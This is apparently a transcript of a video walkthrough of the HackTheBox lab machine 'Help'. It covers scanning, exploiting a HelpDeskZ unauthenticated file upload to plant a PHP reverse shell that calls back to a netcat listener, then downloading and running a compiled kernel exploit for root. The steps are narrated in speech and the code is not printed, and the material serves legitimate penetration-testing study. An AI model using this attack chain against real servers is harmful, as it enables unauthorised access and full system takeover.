Hello and welcome guys, and in this tutorial video we'll be looking at the HackTheBox machine called Help. This box is quite straightforward, also quite tricky because it requires doing some code analysis of the web application we'll be exploiting in order to upload a malicious file, and then we get remote code execution on the box. And once we have a shell on the box as a low privilege user, we find out that the box is actually vulnerable to a kernel exploit in order to get root. So it's quite straightforward. This is the sort of box you might get if you're preparing for the OSCP exam, in the manner of the difficulty at first in order to upload a file and get the exploit working. So let's just have a look at how I did it. So the first thing you have to do is to do an nmap scan. So you can do nmap-sc-sv and provide the IP address 10.10.10.121, which is for help. So I've already done the scan, and if I have a look at the scan results, we can see you've got three ports open. We've got an SSH on port 22. We also got HTTP service running on port 80, and also we've got a weird service which is called PPP running on port 3000. So the first thing I did was to check out the HTTP service. So we can do 10.10.10.121. And all we get is just the default Apache Ubuntu page. So this tells us this box is actually running an Ubuntu operating system. So the next thing I did was to say, right, let's have a look at GoBuster. So we can do GoBuster-u HTTP, supply the IP address, which is 10.10.10.121, provide a word list. So we can do USR share, word list, and then we do the buster, and then we could go into the directory and select the directory list 2.3 medium. So I let that run, and straight away we could see a hidden directory called support, and we could have a look at that, /support. And straight away we're presented with this web application called help-dex-z. So have a look at the source. We could see some information regarding it. So what I did next was to say, right, we know the name of this application. Perhaps there is an exploit for it. So I just do exploit db, help desk, z to see what comes up. And straight away we see an exploit saying help-dex-z version 1.0.2, arbitrary file upload. And having a look at this, it appears to be a Python script from the help or the usage of this exploit. So it says an authenticated shell upload exploit. So we don't require to get the username and password to log in at all. We could remotely upload a file and see how it works. So I'm just going to copy this exploit. So I do copy, and we can see we found another directory called JavaScript. So I'm going to end this, and I'm going to do nano. I'm going to call this help.py. Paste in the exploit, save the exploit, and going back to have a look at this exploit. So we could do nano exploit. We could see help-dex-z version suffers from an authenticated shell upload vulnerability, and going through the exploit, we could see all we have to do is to run the exploit, provide the localhost running the web server address and the PHP file that we want to upload. And if you look at the workings of this, it appears to be that the exploit would calculate the file name and concatenate that with the current time, and then generate a MD5 hash using the plain text, which will be the name of the file, and then create a hash digest. And then if we visit the URL, so the base URL for the HelpDXD web application, plus the MD5 hash, and the extension of the file we uploaded. If the file is found, we get print found. If not, it says print sorry, I did not find anything. So pretty straightforward. It uploads the file and tries to do a curl command to get that file. And once we visit that file page, we should get a shell. So I'm not going to make any changes yet. I'm just going to run python help.py. And we get an error saying if line says grade 3. So he's expecting something there. So let's just give it the IP address, see what happens. So to 10.10.10.121/support. And I'll just give it a file called test.txt. So it appears to be a syntax error in the code. So I'm going to go back and have a look at probably something I didn't quite copy. So here it's saying if length equals 3, print this. So I think this if statement should have perhaps a colon in front of it. So let's have a look at this exploit. Just going to scroll down to that line. So this is an if statement. So let's put a colon there. Run the exploit again. Still saying there's an error. So if length equals 3. So what I'm going to do next is, let's see if there's something different. So we could use search exploit to say help desk Z. And it appears this is the exploit here. So we could do search exploit -examine, and then we examine this. So we can see here there is a less than sign here that actually should have gone into it. So I don't know why that exploit appears to be wrong. So going back here, this is quite missing. So I'm just going to quit this and remove the help.py, and I'm going to say mirror, use the mirror command, and just copy this in here. Overwrite the file. No. So let's go back and examine this file. Examine. So this appears to be the code. So what I'm going to do is to just copy this straight away. So I could go to this directory. So exploit DB. So I'm going to do copy, paste that in, and then copy the path to the file. Paste that in here as well. Put a dot after that, and then clear screen. And if we have a look at the file now, so we could do nano, the script, it appears to be all right. So I'm going to save this and then run this again. So replace this with 4300. And it appears to be working. It says unauthenticated shell upload exploit. But because we haven't got this file, perhaps that's why this isn't working. So I'm going to go back here and see what we can do. So submit a ticket, and we can submit a ticket. So next, provide a name. So I'm going to call this Alex. alex@mail.com. The message could be anything, and also anything in here. So I'm going to try to, so he said, sorry, I couldn't find anything, so that's fine. I'm going to locate a web shell. So locate web shell, and I've got some ones here, but I'm going to go into the PHP web shell. So I'm going to CD in here, list, and we could probably go for this reverse shell one. So I'm going to copy this and put it into the directory. So root HackTheBox /help, and I'm just going to name this web shell.php. So now we can go back to that directory. So cd HackTheBox, cd help, list, and then we have the PHP shell. So we're going to make some changes to this. So we could do nano web shell PHP, and just going to scroll down after the comments and change this to my IP address. So let me just grab my IP address. So ipconfig, ifconfig, turn 0. That's my IP address. Replace that with this. And then the listening port where we want to get a shell, I'm just going to call this 9002 and save the exploit. I'll save the web shell. So going back here, we can select that file. So browse, root, HackTheBox, help, web shell PHP, open, and then there's a captcha. So fill in the captchas, ZYV, submit, and then we get this error saying file not upload. However, I'm going to go back here and try to grab this file. So the file is called web shell. So web shell.php. Going to set up a listener. NC NVLP 9002. Up a listener and click on enter here. And see, we just wait to see what happens. So it says, sorry, I didn't find anything. We don't get a shell. So my next thought was to see if this web application, so you can actually download the vulnerable app here. And then I decided to do help DexZ GitHub. And here we find the scripts and also the source code for the web application. We can see from here, it talks about how to install this. So what I did was to clone this, the web application, and then set it up on another server. So I'm just going to go to my test server. So I've already, installed this web application before shooting this video. Going through the steps here to install the web application, and I've got the web application running on this server. So I'm just going to go and grab the IP address. So ifconfig, and the IP address is 192.168.188.131. So from here, I'm going to try visit that web address. So 162.168. 192.168, and the IP address was 131. And if I go to, I think I call the directory I hosting it help desk. So we've got the same web application here. So what I did was to go into this web application. So I could system places, home. So I go into the file system, var www. And then I go into the help.exe. All right, so here's where the directories and files actually hosting this web application are being stored. So I'm going to try to upload the file and then see exactly where this file is actually uploaded in the web application. Okay. So going back, so we are on our test server now. So I'm going to go to submit ticket, general, next, fill in the details like we did before, browse, and you could go into HackTheBox, help, web shell, open, select that, fill in the captcha, so 7AXYE, submit, and you can see your request has been received. So going back in here, we could, after navigating, I found out if you go to upload tickets, you actually see the file, but the file has been, the file name has been changed to an MD5 hash, just like we've seen in the exploit script saying it's going to convert this to an MD5 string and then .php. So we do have the file here. So I'm going to delete this file and then go back to my Kali box, go back to the web shell and have a look and change this web shell to my local IP address. So I'm just going to find where my local IP address is, if config, and the IP address is not the one for HackTheBox, but this one, and then change this IP address, save the exploit, then go back again to upload the file. So submit ticket, repeat the same steps. Then fill in the captcha. So E8SAL, I believe. Submit. Successfully received. If we go back in here, we can see now the file is there. So all we now need to do now is to run that exploit to see what happens. So we have to go to the directory where this file is actually hosted. So I'm going to go into support / uploads / tickets and click on enter. The IP address is 192.168.188. I think it was 131. Click on enter. It says nothing. So let's just confirm the IP address 188.131. And let's try the exploit again. So uploads, tickets, help desk. So the directory name is help desk, and I think that's what's missing, not support. So type in help desk, click on enter, also says nothing found. So let's have a quick look again at this exploit. So the exploit is 4300.py. And we go straight here to see what happens. So the helpdesk base URL md5 hash.php seems all right. So probably I'm going to put a slash at the end of this. Click on enter again. Now it says files found. So if we open this web app, this link, open link, we get a shell. So if I do ID, who am I, or uname, it actually says Linux. So if config not found. So I could do Python -c import pty -pty.spawn /bin bash. So you can see with www data on Kong, which is the name of this virtual machine or our test machine. So now if I do uname, you can see it's Linux. If I do if config, I'm still saying if config command not found. However, we can actually confirm we have a shell on this box. So this is exactly what we're going to do now on the help HackTheBox machine called help. So I'm going to exit this, clear screen, set up my netcat listener, and then going back here, we're going to make those same changes. So again, nano into the script, get the IP address for my VPN, make the changes. Actually not here, do that in the web shell. Yep, that's where we need to make the change. So that's where we're going to get our reverse shell. Paste the IP address. So we save the exploit there. And then we could change this to support. IP address for help 10.10.10.121. I'm going to call this web shell, so that looks good. Going back here, we're going to go back to submit ticket, general, next, fill in the details like we did before, browse for the file, open, fill in the captcha, so NV, BPL, submit, and it says file not allowed, but we're just going to try to see if the file was uploaded by calling this shell. And there we go, we get a shell. Okay, so if we do who am I, you can see we help. So we've got a shell on the box, and we could then do the same command we ran before, which was Python bin bash. You can see we help on help, so we can do uname -a, tells us Linux help, and tells us the kernel version about, and also telling us an Ubuntu machine as well. So we could just go straight for the home directory, list, cd help, list, and we could see we've got the user.txt. So that appears to be it for user. So I could do export equals screen, and I should be able to clear screen. Right. So now for privilege escalation, if we remember, we check the Linux kernel version, and we can see Linux kernel version is 4.40116 generic. So what I did was to see if there is an exploit for this. I think it's a vulnerable. So we could do Google, and we could do Linux Dix, privilege. I could just do exploit, see what comes up. And we can see straight away there is a Linux kernel local privilege escalation, which requires us to use this exploit in order to and execute it. So we're going to copy this, and I'm going to open another directory. So cd HackTheBox, cd help. I'm going to do make directory web, cd into web, and do a nano exploit.c, paste in the exploit we just copied. Everything looks good. Use gcc exploit.c, the output file, just going to call this out. So we get a lot of warnings, but if we do a list, we can see we got the file, we can run file against it, and we can see straight away it tells us this is a Linux ELF file, 32-bit LSB. But the thing is, if we go back to the shell, we can actually see this is an 8664, telling us this is a 64-bit Linux version, but the file we created is actually a 32-bit LSB, 32-bit file. So that means if we try to execute this file on the box, it probably wouldn't work. So give it a try to see what happens. So I'm going to do Python -m simple HTTP server port 80. I'm going to go onto a shell, cd temp, and I'm going to do wget HTTP 10.10.14, I think is 182 /out. We download the file. You can see we've got the file called out. I think there are other users on this box. So we could do chmod +x out and try to execute this. And we get this error saying file not found. So this is just the same thing I was trying to say. So if we run a file against this, we can see it's a 32-bit, but if we do a uname -a, we can see we're running a 64-bit Linux operating system. So we can remove the out file and then compile this again. So cancel this. This time around, we're going to compile this file as a 32-bit. So in order to do that, or 64, we need to do -m64. And this will probably compile it, but I need to bring something to your attention. So I'm just going to go to here, bookmarks, and how to compile a 32-bit. So how to compile a 32-bit program on 64-bit. So what we need to do is you get an error if you try to do this, just like we found that kind of error. So what you have to do is you have to install this G++ or G++ library first. So I'm going to go here and do that. So it says I've already installed it. So you have to install this first and then try to conduct this again. So now we could do -m64. We get no errors, list, got the file out. Then we go back to our shell and download the exploit like we did before. So wget this out, copy this. I'm going to clear screen first. Okay, see connection refused, and that's because I need to set up my Python HTTP server. Go back here, download the file again. success list. We got the file called out here. So mode to make it executable. Plus X out. And then when we do out, we should get a shell. And there we go. Spawn in root shell, and then we root. So unit, who am I? You can see I'm root, cd into root list, and that's the root flag. So wc.c root.txt, and we get it. So quite a very interesting box, straightforward, but knowing exactly where the directory is one tricky part of this. So setting this up probably on our own test machine to see how it works. And if you're doing the OSCP, these are some of the things you need to have in mind. That you might find a vulnerable application. It's better off, if you're just testing exploits not working, you might want to set this up locally on your own server, test the exploit, see how it works, do some code analysis, and then replicate the same thing you've done on the target to see to get the same response. So hopefully you've enjoyed that, and thanks for watching, and I'll catch you on the next one.